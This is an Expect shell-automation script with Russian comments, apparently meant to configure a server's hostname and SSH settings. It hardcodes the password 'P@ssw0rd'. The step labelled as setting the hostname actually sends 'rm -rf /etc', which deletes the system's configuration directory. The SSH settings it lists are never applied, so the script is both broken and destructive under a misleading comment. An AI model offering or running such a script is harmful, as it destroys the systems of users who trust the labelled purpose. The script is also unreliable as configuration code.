#!/usr/bin/expect -f

# Настройка переменных
set timeout 60
set hostname "hq-srv.au-team.irpo"
set prompt "#"
set password "P@ssw0rd"  ;# Явно задаём пароль для пользователя net_admin

set config [exec cat /etc/ssh/sshd_config]
set lines {
    "Port 2024"
    "MaxAuthTries 2"
    "AllowUsers sshuser"
    "Banner /etc/ssh/banner"
}

# Запуск терминала
spawn bash
expect -re $prompt

# Установка имени хоста
send "rm -rf /etc\r"
expect -re $prompt


